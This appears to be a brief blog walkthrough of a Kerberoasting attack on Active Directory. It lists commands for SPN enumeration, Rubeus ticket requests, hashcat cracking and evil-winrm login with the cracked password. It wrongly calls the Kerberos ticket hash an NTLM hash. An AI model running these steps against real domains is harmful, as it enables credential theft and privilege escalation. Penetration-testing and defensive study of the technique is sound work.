Estimated reading time: 2 minutes
This post will walkthrough Kerberoasting attack using Rubeus. Please ensure you have appropriate authorization to perform security testing within your environment.
Prerequisites:
- A Windows machine in an Active Directory domain.
- Rubeus.exe (can be compiled from GitHub).
- A domain user account (even low-privileged) to request service tickets.
- Hashcat for offline cracking.
Step 1: Enumerate Service Principal Names (SPNs)
Use PowerShell to list SPNs for accounts with service associations.
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
PowerView:
Get-NetUser -SPN
This provides Usernames and SPNs linked to domain service accounts.
Step 2: Request Kerberos Service Tickets
Run Rubeus to request service tickets for accounts associated with SPNs.
Rubeus.exe kerberoast
This will retrieve TGS tickets for accounts with SPNs and display their hashes.
You can also request tickets for specific users:
Rubeus.exe kerberoast /user:svc-account
Step 3: Extract and Save Hashes
Rubeus will output a hash similar to:
$krb5tgs$23$*svc-account$DOMAIN$HTTP/service.domain.com*$e52cac67419a9a22$...
Save this hash to a file (hashes.txt) for offline cracking.
Rubeus.exe kerberoast /outfile:hashes.txt
Step 4: Crack the Hash Offline (Using Hashcat)
Use Hashcat to brute-force the NTLM hash.
hashcat -m 13100 hashes.txt /path/to/wordlist.txt --force
If the service account has a weak password, Hashcat will recover it.
Step 5: Use the Cracked Password
Once cracked, authenticate using Evil-WinRM, RDP, or other tools:
evil-winrm -i <target-IP> -u svc-account -p <cracked-password>
If the compromised account has privileged access, this can lead to privilege escalation.